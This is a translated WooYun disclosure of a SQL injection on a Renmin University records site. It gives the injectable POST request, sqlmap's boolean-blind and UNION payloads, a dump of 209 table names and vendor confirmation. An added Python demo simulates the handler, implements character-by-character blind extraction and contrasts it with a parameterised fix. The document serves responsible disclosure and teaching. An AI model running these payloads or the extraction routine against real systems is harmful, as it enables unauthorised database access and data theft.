
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0107614

Title: SQL injection vulnerability on a 中国人民大学 (Renmin University of China) site

Vendor: 中国人民大学 (Renmin University of China)

Author: 深度安全实验室

Submitted: 2015-04-14 18:46

Fixed: 2015-05-30 09:24

Published: 2015-05-30 09:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-04-14: Details sent to the vendor, awaiting vendor handling
2015-04-15: Vendor confirmed; details visible to the vendor only
2015-04-25: Details disclosed to core white hats and domain experts
2015-05-05: Details disclosed to regular white hats
2015-05-15: Details disclosed to intern white hats
2015-05-30: Details disclosed to the public

Brief description:

Detailed description:

http://erm-kbs.ruc.edu.cn/

The electronic records management knowledge base (电子文件管理知识库) is vulnerable to SQL injection in the following request:

POST /ext/getwx.ashx?t=info HTTP/1.1
Content-Length: 99
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://erm-kbs.ruc.edu.cn:80/Ext/WxDetail.aspx?type=50&id=d9ef9331-1aae-46fd-85f5-956711b5f083
Host: erm-kbs.ruc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
wxid=d9ef9331-1aae-46fd-85f5-956711b5f083&wxtype=50

The injectable parameter is wxid. Its value lands inside a single-quoted string in the WHERE clause: each payload below closes that quote after the GUID, appends an attacker-controlled condition, and ends with 'uPCZ'='uPCZ so that the original closing quote is consumed and the statement stays syntactically valid.

(screenshot: 1.JPG)


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: wxid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: wxid=d9ef9331-1aae-46fd-85f5-956711b5f083' AND 4059=4059 AND 'uPCZ'='uPCZ&wxtype=50
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: wxid=d9ef9331-1aae-46fd-85f5-956711b5f083' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(113)+CHAR(120)+CHAR(102)+CHAR(69)+CHAR(82)+CHAR(81)+CHAR(87)+CHAR(67)+CHAR(66)+CHAR(111)+CHAR(86)+CHAR(113)+CHAR(119)+CHAR(110)+CHAR(111)+CHAR(113),NULL-- &wxtype=50
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: renda
[209 tables]
+---------------------------+
| DB_FWQPZ |
| DB_SHAITU |
| DB_ZDDY |
| DB_ZDDYPZ |
| D_FGF |
| D_FLB |
| D_PZK |
| Droit_Item |
| DropMessages |
| F_TABLE |
| FullTextIndexFiles |
| FullTextIndexFiles_backup |
| GROUPS |
| Info2kGetDwg |
| InfoSysDocument |
| OA_INFO |
| OPERATORS |
| RIGHT_LIST |
| RIGHT_TREE |
| S_AUTOSET |
| S_BORROW_1 |
| S_DALX |
| S_GLMS |
| S_KUFANG_1 |
| S_LOG |
| S_MLINdex |
| S_MLS |
| S_QZH |
| S_REPORT |
| S_TJPROJECT |
| TMP_S_BORROW_1 |
| UserCounter |
| code01dict |
| code02dict |
| code11dict |
| code12dict |
| code15dict |
| code16dict |
| code17dict |
| code18dict |
| code19dict |
| code20dict |
| code21dict |
| code22dict |
| code23dict |
| code24dict |
| code25dict |
| code26dict |
| code27dict |
| code28dict |
| code29dict |
| code30dict |
| code31dict |
| code32dict |
| code33dict |
| code34dict |
| code35dict |
| code36dict |
| code37dict |
| code38dict |
| codetypedict |
| datatable102 |
| datatable103 |
| datatable104 |
| datatable105 |
| datatable106 |
| datatable107 |
| datatable109 |
| datatable111 |
| datatable114 |
| datatable115 |
| datatable116 |
| datatable117 |
| datatable118 |
| datatable119 |
| datatable120 |
| datatable121 |
| datatable85 |
| datatable86 |
| datatable87 |
| datatable88 |
| datatable89 |
| datatable90 |
| destroy_datatable102 |
| destroy_datatable103 |
| destroy_datatable104 |
| destroy_datatable105 |
| destroy_datatable106 |
| destroy_datatable107 |
| destroy_datatable109 |
| destroy_datatable111 |
| destroy_datatable114 |
| destroy_datatable115 |
| destroy_datatable116 |
| destroy_datatable117 |
| destroy_datatable118 |
| destroy_datatable119 |
| destroy_datatable120 |
| destroy_datatable121 |
| destroy_datatable85 |
| destroy_datatable86 |
| destroy_datatable87 |
| destroy_datatable88 |
| destroy_datatable89 |
| destroy_datatable90 |
| destroy_sw |
| dtproperties |
| e_datatable102 |
| e_datatable103 |
| e_datatable104 |
| e_datatable105 |
| e_datatable106 |
| e_datatable107 |
| e_datatable109 |
| e_datatable111 |
| e_datatable114 |
| e_datatable115 |
| e_datatable116 |
| e_datatable117 |
| e_datatable118 |
| e_datatable119 |
| e_datatable120 |
| e_datatable121 |
| e_datatable85 |
| e_datatable86 |
| e_datatable87 |
| e_datatable88 |
| e_datatable89 |
| e_datatable90 |
| e_destroy_datatable102 |
| e_destroy_datatable103 |
| e_destroy_datatable104 |
| e_destroy_datatable105 |
| e_destroy_datatable106 |
| e_destroy_datatable107 |
| e_destroy_datatable109 |
| e_destroy_datatable111 |
| e_destroy_datatable114 |
| e_destroy_datatable115 |
| e_destroy_datatable116 |
| e_destroy_datatable117 |
| e_destroy_datatable118 |
| e_destroy_datatable119 |
| e_destroy_datatable120 |
| e_destroy_datatable121 |
| e_destroy_datatable85 |
| e_destroy_datatable86 |
| e_destroy_datatable87 |
| e_destroy_datatable88 |
| e_destroy_datatable89 |
| e_destroy_datatable90 |
| eplotjiekou |
| fafangcode |
| jiekou |
| plot_info |
| right_detail |
| s_Condition |
| s_kufanginfo |
| s_mkset |
| s_userset |
| s_xtpxzd |
| tableform |
| tmp_datatable102 |
| tmp_datatable103 |
| tmp_datatable104 |
| tmp_datatable105 |
| tmp_datatable106 |
| tmp_datatable107 |
| tmp_datatable109 |
| tmp_datatable111 |
| tmp_datatable114 |
| tmp_datatable115 |
| tmp_datatable116 |
| tmp_datatable117 |
| tmp_datatable118 |
| tmp_datatable119 |
| tmp_datatable120 |
| tmp_datatable121 |
| tmp_datatable85 |
| tmp_datatable86 |
| tmp_datatable87 |
| tmp_datatable88 |
| tmp_datatable89 |
| tmp_datatable90 |
| tsqx |
| usertbl |
| userwebqx |
| view_datatable102 |
| view_datatable103 |
| view_datatable104 |
| view_datatable105 |
| view_datatable106 |
| view_datatable107 |
| view_datatable109 |
| view_datatable111 |
| view_datatable114 |
| view_datatable115 |
| view_datatable116 |
| view_datatable117 |
| view_datatable118 |
| view_datatable119 |
| view_datatable120 |
| view_datatable121 |
| view_datatable85 |
| view_datatable86 |
| view_datatable87 |
| view_datatable88 |
| view_datatable89 |
| view_datatable90 |
+---------------------------+

(screenshot: 2.JPG)
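The following is an added example, not the report author's code and not the site's own handler. It simulates, in Python, the handler shape behind /ext/getwx.ashx that produces the findings above (user input concatenated into the SQL text), with an in-memory SQLite database standing in for the real Microsoft SQL Server 2008 backend; SQLite's substr()/unicode() therefore take the place of T-SQL's SUBSTRING()/ASCII(), and sqlite_master stands in for sys.tables. The table and column names wx_info, wxid, wxtype and title are assumptions, as is the row content. It replays the report's boolean-based payload against the vulnerable handler and against a parameterised one, then shows how such a true/false oracle recovers a table name one character at a time, which is the mechanism behind the 209-table dump above.

```python
"""Boolean-based blind SQL injection, worked through against a stand-in for
/ext/getwx.ashx?t=info.  Added example; the handler, schema and data are
assumptions, not the site's code.  SQLite replaces the MSSQL 2008 backend."""
import sqlite3

# Record id taken from the report's request; the row content is constructed.
SAMPLE_ID = "d9ef9331-1aae-46fd-85f5-956711b5f083"

# First payload is sqlmap's boolean-based probe from the report; the second is
# a constructed negative control with the numeric comparison made false.
TRUE_PAYLOAD = SAMPLE_ID + "' AND 4059=4059 AND 'uPCZ'='uPCZ"
FALSE_PAYLOAD = SAMPLE_ID + "' AND 4059=4060 AND 'uPCZ'='uPCZ"

# Stand-in for table enumeration; in T-SQL this would be something like
# (SELECT TOP 1 name FROM sys.tables).
TABLE_NAME_EXPR = "(SELECT name FROM sqlite_master WHERE type='table' LIMIT 1)"


def make_db():
    """Create the simulated backend with a single record of type 50."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wx_info (wxid TEXT, wxtype INTEGER, title TEXT)")
    conn.execute("INSERT INTO wx_info VALUES (?, ?, ?)",
                 (SAMPLE_ID, 50, "Sample record"))
    conn.commit()
    return conn


def vulnerable_getwx(conn, wxid, wxtype):
    """Vulnerable handler: POST fields are spliced straight into the SQL text."""
    sql = f"SELECT title FROM wx_info WHERE wxid='{wxid}' AND wxtype={wxtype}"
    return [row[0] for row in conn.execute(sql)]


def fixed_getwx(conn, wxid, wxtype):
    """Hardened handler: bound parameters, so a payload is only a literal value."""
    sql = "SELECT title FROM wx_info WHERE wxid=? AND wxtype=?"
    return [row[0] for row in conn.execute(sql, (wxid, int(wxtype)))]


def oracle(conn, condition):
    """Blind oracle: True when the injected condition holds (record returned),
    False when it does not (empty response)."""
    payload = f"{SAMPLE_ID}' AND ({condition}) AND 'uPCZ'='uPCZ"
    return bool(vulnerable_getwx(conn, payload, 50))


def extract_string(conn, expr, max_len=64):
    """Recover the value of SQL expression `expr` one character at a time with
    a binary search over the 7-bit ASCII range per position (7 oracle queries
    per character plus one length probe).  SQLite's substr()/unicode() play
    the role of T-SQL's SUBSTRING()/ASCII()."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length({expr}) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def demo():
    """Replay the report's payload against both handlers and enumerate the
    first table name through the blind oracle."""
    conn = make_db()
    return {
        "vuln_true": vulnerable_getwx(conn, TRUE_PAYLOAD, 50),
        "vuln_false": vulnerable_getwx(conn, FALSE_PAYLOAD, 50),
        "fixed_payload": fixed_getwx(conn, TRUE_PAYLOAD, 50),
        "fixed_legit": fixed_getwx(conn, SAMPLE_ID, 50),
        "first_table": extract_string(conn, TABLE_NAME_EXPR),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The contrast between vuln_true and vuln_false is exactly the signal sqlmap's boolean-based check relies on: the same record comes back for a true condition and nothing for a false one, so any expression the database can evaluate becomes a one-bit channel. Against the parameterised handler the report's payload matches no row while the legitimate GUID still does, which is the fix the empty "Fix recommendation" section would call for.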


Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit 深度安全实验室@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-04-15 09:24

Vendor reply:

Thank you very much! The responsible party has been notified.

Latest status:

None yet